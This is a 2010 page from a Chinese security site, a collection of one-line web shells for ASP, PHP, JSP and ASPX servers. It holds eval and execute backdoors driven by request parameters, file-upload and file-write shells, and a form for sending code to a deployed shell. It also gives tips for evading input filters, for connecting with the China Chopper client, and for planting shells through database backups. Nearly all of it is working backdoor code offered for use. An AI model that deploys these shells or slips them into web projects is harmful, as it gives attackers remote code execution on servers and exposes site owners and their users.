首頁 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
  當前位置:主頁>安全文章>文章資料>網絡安全>文章內容
一句話木馬
來源:vfocus.net 作者:vfocus 發布時間:2010-07-28  
asp一句話木馬

程序代碼 程序代碼
<%eval request("sb")%>

程序代碼 程序代碼
<%execute request("sb")%>

程序代碼 程序代碼
<%execute(request("sb"))%>

程序代碼 程序代碼
<%execute request("sb")%><%'<% loop <%:%>

程序代碼 程序代碼
<%'<% loop <%:%><%execute request("sb")%>

程序代碼 程序代碼
<%execute request("sb")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("sb"))</script>

程序代碼 程序代碼
%><%Eval(Request(chr(35)))%><%

程序代碼 程序代碼
<%eval request("sb")%>

程序代碼 程序代碼
<%ExecuteGlobal request("sb")%>

程序代碼 程序代碼
if Request("sb")<>"" then ExecuteGlobal request("sb") end if
//容錯代碼
程序代碼 程序代碼
<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%
var lcx = {'名字' : Request.form('#'), '性別' : eval, '年齡' : '18', '昵稱' : '請叫我一聲老大'};
lcx.性別((lcx.名字)+'');
%>


//使用冰狐一句話客戶端鏈接

程序代碼 程序代碼
<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '參數SubCode作為過程代碼
o.run "e",Server,Response,Request,Application,Session,Error '參數名e 調用之,同時壓入6個基對象作為參數
%>


調用示例:
程序代碼 程序代碼
http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29



php一句話

程序代碼 程序代碼
<?php eval($_POST[sb])?>

程序代碼 程序代碼
<?php @eval($_POST[sb])?>
           //容錯代碼
程序代碼 程序代碼
<?php assert($_POST[sb]);?>
        //使用lanker一句話客戶端的專家模式執行相關的php語句
程序代碼 程序代碼
<?$_POST['sa']($_POST['sb']);?>

程序代碼 程序代碼
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>

程序代碼 程序代碼
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
      //使用這個后,使用菜刀一句話客戶端在配置連接的時候在"配置"一欄輸入
程序代碼 程序代碼
<O>[email protected]($_POST[c]);</O>


程序代碼 程序代碼
<script language="php">@eval($_POST[sb])</script>
//繞過<?限制的一句話



JSP一句話

程序代碼 程序代碼
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>


提交客戶端

程序代碼 程序代碼
<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
<input type=submit value="提交">
</form>



ASPX一句話
程序代碼 程序代碼
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>


程序代碼 程序代碼

<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
//Jscript的asp.net一句話

程序代碼 程序代碼
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"])  ); }%>
//C#的asp.net一句話

程序代碼 程序代碼
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
VB的asp.net一句話

第一:114la網址導航系統后臺getwebshell,最新版本,已經禁止了直接輸入<?php這樣的代碼
所以可以試用<script language="php">...<script>來繞過

第二,使用菜刀的附加數據功能可以出現很多轉換.所以還是仔細閱讀下菜刀的readme.txt,上面的代碼來自LCX的博客

第三,使用mssql備份一句話的時候,特別是asp.net和jsp,因為代碼過長,所以,需要再代碼前面和后面多加空格等垃圾字符保證代碼完整性,這個跟備份bat到啟動項一個原理.

 
[推薦] [評論(1條)] [返回頂部] [打印本頁] [關閉窗口]  
匿名評論
評論內容:(不能超過250字,需審核后才會公布,請自覺遵守互聯網相關政策法規。
 §最新評論:
  熱點文章
·samcrypt.lib簡介
·教你輕松查看QQ空間加密后的好友
·web sniffer 在線嗅探/online ht
·Cisco PIX525 配置備忘
·SPIKE與Peach Fuzzer相關知識
·用Iptables+Fedora做ADSL 路由器
·檢查 Web 應用安全的幾款開源免
·Md5(base64)加密與解密實戰
·asp,php,aspx一句話集合
·NT下動態切換進程分析筆記
·風險評估中的滲透測試
·QQ2009正式版SP4文本信息和文件
  相關文章
·自動化操控虛擬戰爭
·網絡滲透測試指導手冊
·SPIKE與Peach Fuzzer相關知識
·麻煩的終結者
·從真實故事說起 讀黑客戰術社會
·記錄一次網站被黑抓馬記
·IDS規避與對策
·Web開發框架安全雜談
·系統監控:蜜罐分析技術
·QQ2009正式版SP4文本信息和文件
·一臺肉雞能創造多少價值?為您講
·關于流量,木馬,插件,網馬賺錢
  推薦廣告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved
期本期特码